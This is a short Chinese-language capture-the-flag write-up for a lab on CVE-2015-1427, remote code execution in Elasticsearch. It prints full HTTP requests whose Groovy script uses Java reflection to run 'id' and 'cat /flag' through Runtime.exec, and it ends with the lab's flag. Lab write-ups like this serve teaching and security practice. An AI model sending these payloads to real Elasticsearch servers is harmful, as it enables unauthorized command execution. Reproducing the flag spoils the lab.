春秋云镜 CVE-2015-1427

春秋云镜 CVE-2015-1427 ElasticSearch RCE

靶标介绍

ElasticSearch RCE

启动场景

漏洞利用

因查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据：

POST /website/blog/ HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 23

{
	  "name": "test"
}

利用反射机制执行id：

POST /_search?pretty HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 513

{

    "size":1,

    "script_fields": {

        "test#": {  

            "script":

                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",

 

            "lang": "groovy"

        }

    }
}

利用反射机制获取flag：

POST /_search?pretty HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 515

{

    "size":1,

    "script_fields": {

        "test#": {  

            "script":

                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /flag\").getInputStream())).readLines()",

 

            "lang": "groovy"

        }

    }

}

base64解码

得到flag

flag{ad8fbede-0291-4a7b-a284-bf60d6ac6aa1}